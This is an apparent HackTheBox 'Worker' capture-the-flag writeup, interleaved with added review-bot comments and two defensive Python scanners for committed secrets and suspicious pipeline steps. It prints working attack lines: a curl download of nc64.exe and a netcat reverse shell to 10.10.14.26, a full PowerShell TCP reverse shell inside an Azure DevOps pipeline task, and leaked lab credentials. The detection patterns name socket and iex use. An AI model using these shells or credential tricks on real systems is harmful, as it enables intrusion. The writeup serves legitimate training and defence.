Worker — HackTheBox

Worker

TL;DR

This box takes you through some of the repercussions of an attacker gaining a foothold in your organization, and how they would compromise your development infrastructure to pivot or gain persistence.

Foothold Reconnaissance

For the initial recon you start with an Nmap scan:

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

svn checkout svn://worker.htb
kali@kali:~/HTB/Worker$ svn log
--------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
--------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
--------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
--------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
--------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
--------------------------------------------------------------------
kali@kali:~/HTB/Worker$ svn diff -r 1:2
Index: deploy.ps1
===================================================================
--- deploy.ps1 (nonexistent)
+++ deploy.ps1 (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen"
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
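
Review bot: the account password is committed in clear on the `$plain = "wendel98"` line, and piping it through ConvertTo-SecureString on the next line protects nothing, because anyone who can check the repository out (svnserve here accepts an anonymous checkout) already has the literal. The credential belongs in a secret store or a pipeline secret variable rather than in the script, and it needs rotating, since revision 2 keeps it in history even after the file is removed. Two smaller points: ConvertTo-SecureString without `-AsPlainText` expects an encrypted standard string and will reject this literal as written, and `$pwd` and `$args` shadow PowerShell's automatic variables.
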
kali@kali:~/HTB/Worker$ svn diff -r 4:5
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
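
Review bot: the note points users at http://devops.worker.htb but leaves revisions 1 to 5 on this server, so the credential added in revision 2 remains readable to anyone who can check the old repository out; retire the old repository, or at least restrict svnserve access to it, as part of the migration instead of only announcing the new location. Typo on the first added line: "maintaned" should be "maintained".
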

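Seen from the defending side, the revision-2 hunk above is exactly what a pre-commit or repository-history secret scan should catch. The following Python is an added example, not part of the original writeup: it walks unified diff output such as `svn diff` prints, numbers the added lines on the new-file side, and flags credential literals and in-script ConvertTo-SecureString use, with the deploy.ps1 hunk from the page as its sample input. The variable-name list and the reason strings are this example's own heuristics.

```python
import re

# Sample input: the deploy.ps1 hunk exactly as shown by `svn diff -r 1:2` in this writeup.
SAMPLE_DIFF = """Index: deploy.ps1
===================================================================
--- deploy.ps1 (nonexistent)
+++ deploy.ps1 (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen"
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
"""

# A quoted literal assigned to a variable whose name suggests a secret ($plain, $pwd, $token ...).
SECRET_ASSIGN = re.compile(
    r'\$(?P<name>\w*(?:pass|pwd|plain|secret|token|cred|key)\w*)\s*=\s*[\'"][^\'"]+[\'"]', re.I)
# A SecureString built inside the script protects nothing when its source value is in the same file.
INLINE_SECURESTRING = re.compile(r"ConvertTo-SecureString", re.I)
HUNK_HEADER = re.compile(r"^@@ -\d+(?:,\d+)? \+(?P<start>\d+)(?:,\d+)? @@")

def find_hardcoded_secrets(diff_text):
    """Return (file, new_line_no, reason, text) for each added line that looks like a committed secret."""
    findings, current_file, line_no = [], None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("Index: "):             # svn-style file header names the file
            current_file = raw[len("Index: "):].strip()
            continue
        if raw.startswith(("--- ", "+++ ")):      # unified-diff file headers are not content
            continue
        header = HUNK_HEADER.match(raw)
        if header:                                # restart numbering on the new-file side of the hunk
            line_no = int(header.group("start")) - 1
            continue
        if raw.startswith("+"):                   # added line: the only kind that introduces a secret
            line_no += 1
            text = raw[1:]
            if (m := SECRET_ASSIGN.search(text)):
                findings.append((current_file, line_no, f"literal assigned to ${m.group('name')}", text))
            elif INLINE_SECURESTRING.search(text):
                findings.append((current_file, line_no, "SecureString built from in-script value", text))
        elif raw.startswith(" "):                 # unchanged context line also advances the new-file count
            line_no += 1
    return findings

if __name__ == "__main__":
    for path, num, reason, text in find_hardcoded_secrets(SAMPLE_DIFF):
        print(f"{path}:{num}: {reason}: {text}")
```

Run against the whole history (`svn diff -r 0:HEAD`) rather than only the working copy, since a secret removed in a later revision is still retrievable from the earlier one.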
Foothold

Since you now have access to the repo, the goal is to drop a web shell into the repo and have it built and deployed. If you are on Kali, a copy of such a shell is already at “/usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx”.

cd \Windows\Temp\ && curl -O http://10.10.14.26:8000/nc64.exe
\Windows\Temp\nc64.exe 10.10.14.26 1337 -e cmd.exe

User Reconnaissance

Once on the box you will realize that you cannot do much, since you are the user “defaultapppool”.

kali@kali:~/HTB/Worker$ listen 1337
listening on [any] 1337 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 59604
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of C:\Users

2020-07-07 16:53 <DIR> .
2020-07-07 16:53 <DIR> ..
2020-03-28 14:59 <DIR> .NET v4.5
2020-03-28 14:59 <DIR> .NET v4.5 Classic
2020-08-17 23:33 <DIR> Administrator
2020-03-28 14:01 <DIR> Public
2020-07-22 00:11 <DIR> restorer
2020-07-08 18:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10 303 868 928 bytes free
C:\Users>cd robisl
cd robisl
Access is denied.
C:\Users>whoami
whoami
iis apppool\defaultapppool
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
...
robisl = wolves11
...

User Flag

With these credentials you can use Evil-WinRM to connect as “robisl” and grab the user flag.

kali@kali:~/HTB/Tools$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir
Directory: C:\Users\robisl\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/6/2020 4:21 AM 34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop>

Root Reconnaissance

Since we have credentials for the user “robisl”, the next step is to explore what he can do in the Azure DevOps portal.

Root Flag

To create a pipeline, go to the Pipelines blade and click “New pipeline”. Select “Azure Repos Git”, then the actual repository. Next, pick a project type for the pipeline you are creating; it does not matter which one, since the generated YAML is replaced in the next step. When the YAML is shown in the final step, replace the “steps” section with the following, which runs a PowerShell task.

- task: PowerShell@2
  timeoutInMinutes: 10
  inputs:
    targetType: 'inline'
    script: "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.26',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
kali@kali:~/HTB/Worker$ listen 4443
listening on [any] 4443 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 51469
PS W:\agents\agent11\_work\14\s> cd C:
PS C:\> cd Users\Administrator
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2020-12-07 18:06 34 root.txt
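From the defender's side, the pipeline above shows why the right to create or edit pipeline YAML is effectively the right to run code on the build agent, which here can read the Administrator's desktop. The following Python is an added example, not part of the original writeup: a small review check that flags inline PowerShell steps whose script uses the socket and dynamic-execution primitives seen in this pipeline. The sample pipeline, the `ATTACKER_IP` placeholder, the minimal YAML reader and the indicator list are all this example's own constructions.

```python
import re

# Constructed sample: one benign inline step and one shaped like the writeup's step (placeholder address).
SAMPLE_PIPELINE = """steps:
- task: PowerShell@2
  displayName: Build
  inputs:
    targetType: 'inline'
    script: Write-Host "Building site"
- task: PowerShell@2
  timeoutInMinutes: 10
  inputs:
    targetType: 'inline'
    script: "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4443); iex $data"
"""

# Indicators that an inline build step is doing something other than building (this example's own list).
RISKY = [
    (r"Net\.Sockets\.TCPClient", "opens a raw TCP socket from the build agent"),
    (r"\biex\b|Invoke-Expression", "executes dynamically supplied code"),
]

def parse_steps(yaml_text):
    """Minimal reader for the flat `- task:` / `inputs:` shape above (single-line scripts only).
    A production check should load the YAML with a real parser to handle block scalars."""
    steps, cur = [], None
    for line in yaml_text.splitlines():
        s = line.strip()
        if s.startswith("- task:"):
            cur = {"task": s.split(":", 1)[1].strip()}
            steps.append(cur)
        elif cur is not None and ":" in s and not s.startswith("#"):
            key, value = s.split(":", 1)
            cur[key.strip()] = value.strip().strip("'\"")
    return steps

def review_pipeline(yaml_text):
    """Return (step_index, task, reason) for every inline PowerShell step matching a RISKY indicator."""
    findings = []
    for idx, step in enumerate(parse_steps(yaml_text)):
        if not (step["task"].startswith("PowerShell@") and step.get("targetType", "").lower() == "inline"):
            continue
        for pattern, reason in RISKY:
            if re.search(pattern, step.get("script", ""), re.IGNORECASE):
                findings.append((idx, step["task"], reason))
    return findings

if __name__ == "__main__":
    for idx, task, reason in review_pipeline(SAMPLE_PIPELINE):
        print(f"step {idx} ({task}): {reason}")
```

A check like this complements, rather than replaces, branch policies that require review for pipeline YAML changes and agent pools that do not run under a privileged account.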